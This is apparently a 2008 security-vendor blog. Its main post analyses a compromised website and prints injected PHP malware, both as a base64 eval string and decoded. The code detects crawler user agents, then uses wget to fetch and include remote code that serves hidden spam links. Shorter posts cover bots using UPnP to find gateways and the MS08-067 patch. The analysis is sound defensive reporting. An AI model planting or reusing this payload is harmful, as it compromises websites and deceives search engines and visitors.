Tuesday, November 11, 2008

Compromised Sites Boost PageRank for Porn

A recent analysis of a compromised web site by eSoft's Threat Prevention Team lead to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google, Microsoft and Yahoo.

The website reviewed, dancescape.tv, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler.

The PHP code in question looks like this:


eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));


And resolves to this:


if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt");
include("/tmp/getincl.txt");
}


When viewing the page with a user agent of googlebot, you get a lot of links that weren't there before. Here's a screenshot of one of the less offensive examples:

Picture 1.png


In other instances, a ton of porn links and text are displayed instead of the pharmaceutical links shown here.

This just proves the trends from open compromise to secret compromise. Most malware already tries to hide itself; web site defacements seem also to be a thing of the past as compromised sites are used more and more for relaying attacks and for more stealthy, income earning purposes.

Friday, October 24, 2008

Malware scanning for different gateways

Recently eSoft's Threatlabs found an increase in malware using uPnP - SSDP protocols to find new gateways out of a network. It appears that the effectiveness and increased use of IPS have impacted bot maintainers. Their answer - find another gateway. They are now sending uPnP packets to discover different gateways on their local network. If you are an IT manager, be sure to know where all the exits on your network live.

Microsoft out-of-band release

It's been a long time since our last post, but this weeks activity warrants a post. Yesterday, Microsoft announced a critical update (MS08-067), which occurred out of their normal "Patch Tuesday" cycle. Well it turns out that it was a good idea. The patch closes a security hole in how Windows systems communicate with each other. This vulnerability has the potential to be exploited through worm and spread wildly. It is advised that all users update with Windows systems as soon as possible.